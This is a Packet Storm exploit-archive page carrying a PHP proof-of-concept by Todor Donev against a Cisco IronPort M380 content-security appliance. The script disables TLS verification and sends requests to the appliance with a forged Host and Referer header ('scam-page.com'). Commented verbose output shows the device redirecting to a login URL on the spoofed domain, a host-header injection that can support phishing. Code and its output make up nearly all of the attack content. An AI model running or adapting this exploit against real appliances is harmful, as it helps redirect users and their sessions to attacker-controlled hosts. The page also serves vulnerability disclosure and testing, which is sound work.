what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification
Posted Sep 9, 2019
Authored by Todor Donev

Cisco Content Security Virtual Appliance M380 IronPort remote cross site host modification demo exploit.

tags | exploit, remote
systems | cisco
SHA-256 | 73c9d99009b7401255bba6a1f56507939d40908be4130273b2c562c5a4a3adb6

Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification

Change Mirror Download
<?php
//
// Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
// Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
// Disclaimer:
// This or previous programs are for Educational purpose ONLY. Do not use it without permission.
// The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
// caused by direct or indirect use of the information or functionality provided by these programs.
// The author or any Internet provider bears NO responsibility for content or misuse of these programs
// or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
// system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
// responsibility.
//
// Use them at your own risk!
//
//
// [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
// PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019
// Listening on http://localhost:1337
// Document root is /home/test/ironport
// Press Ctrl-C to quit.
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * Initializing NSS with certpath: sql:/etc/pki/nssdb
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:47:59 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:47:59 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
// < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:48:00 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:48:00 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
// < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
//


$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control: public',
'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
'Host: '.$fake_host,
'Referer: '.$fake_host,
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch);
curl_close($ch);
echo $output;
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close